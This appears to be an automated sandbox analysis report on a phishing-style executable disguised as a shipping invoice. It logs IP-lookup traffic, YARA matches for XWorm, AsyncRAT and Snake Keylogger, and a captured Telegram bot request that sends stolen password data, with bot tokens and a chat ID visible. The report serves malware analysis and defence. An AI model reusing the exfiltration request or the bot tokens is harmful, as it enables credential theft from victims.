Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: bin14.ydns.eu
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7605720342:AAEvFhVZXgNZX-Y_OQTATaG7Q9Glh4EocyI/sendDocument?chat_id=6009622255&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd45a925b30a48Host: api.telegram.orgContent-Length: 570Connection: Keep-Alive

Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.000000000383F000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.000000000353D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003907000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.000000000393B000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.000000000394F000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.00000000038CD000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003829000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003702000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000036BA000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000036EE000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003680000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000035DC000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003693000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.0000000003391000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.000000000337E000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033A5000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033ED000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.0000000003400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033ED000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.0000000003400000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000032C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003711000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: bxhciy.exe, 0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp, ungagCKiEnZdl.exe, 00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe.9.dr	String found in binary or memory: http://checkip.dyndns.org/q
Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003907000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.000000000393B000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.000000000394F000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.00000000038CD000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003849000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003702000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000036BA000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000035FC000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000036EE000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003680000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003693000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.0000000003391000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.000000000337E000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000032FA000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033A5000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033ED000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033B9000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.0000000003400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: SCS AWB and Commercial Invoice.exe, 00000000.00000002.2088900263.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, SCS AWB and Commercial Invoice.exe, 00000009.00000002.4514232504.0000000003131000.00000004.00000800.00020000.00000000.sdmp, HOYVjVj.exe, 0000000A.00000002.2124704739.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 0000000F.00000002.2201890308.0000000003E52000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003711000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000034C1000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 00000019.00000002.2257884546.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000031C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.000000000383F000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.000000000353D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.000000000383F000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4533314593.000000001BCCE000.00000004.00000020.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.000000000353D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.000000000353D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7522567592:AAENXg2LZszJpvr2SAe_G2z5u_54oYaW6pI/sendDocument?chat_id=6009
Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003A8D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7605720342:AAEvFhVZXgNZX-Y_OQTATaG7Q9Glh4EocyI/sendDocument?chat_id=6009
Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003907000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.000000000393B000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.000000000394F000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.00000000038CD000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003877000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003829000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000002.4510487041.00000000038E0000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003702000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000036BA000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000036EE000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003680000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000035DC000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.000000000362A000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.0000000003693000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.0000000003328000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.0000000003391000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.000000000337E000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033A5000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033ED000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000033B9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: bxhciy.exe, 0000000F.00000002.2212820152.0000000017034000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe, 00000010.00000000.2162076092.0000000000442000.00000002.00000001.01000000.0000000E.sdmp, bdeukn.exe, 00000010.00000002.4510487041.0000000003829000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000035DC000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 00000019.00000002.2265748845.0000000016F04000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000032DA000.00000004.00000800.00020000.00000000.sdmp, bdeukn.exe.9.dr	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.0000000003400000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: bdeukn.exe, 00000010.00000002.4510487041.0000000003829000.00000004.00000800.00020000.00000000.sdmp, bxhciy.exe, 00000017.00000002.4511169630.00000000035DC000.00000004.00000800.00020000.00000000.sdmp, ungagCKiEnZdl.exe, 0000001C.00000002.4510340081.00000000032DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189p

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49818 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49872 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture screen (.Net source)

Source: bdeukn.exe.9.dr, COVID19.cs

.Net Code: TakeScreenshot

Contains functionality to log keystrokes (.Net Source)

Source: bdeukn.exe.9.dr, COVID19.cs

.Net Code: VKCodeToUnicode

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.HOYVjVj.exe.352e4c4.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 10.2.HOYVjVj.exe.352e4c4.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 14.2.HOYVjVj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 14.2.HOYVjVj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.HOYVjVj.exe.352e4c4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 10.2.HOYVjVj.exe.352e4c4.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 10.2.HOYVjVj.exe.35369a4.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 10.2.HOYVjVj.exe.35369a4.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 16.0.bdeukn.exe.440000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 10.2.HOYVjVj.exe.35369a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 10.2.HOYVjVj.exe.35369a4.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc93e8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.bxhciy.exe.17053d48.5.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 0.2.SCS AWB and Commercial Invoice.exe.2fc0efc.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 25.2.ungagCKiEnZdl.exe.16f04680.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 25.2.ungagCKiEnZdl.exe.16f23cc0.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
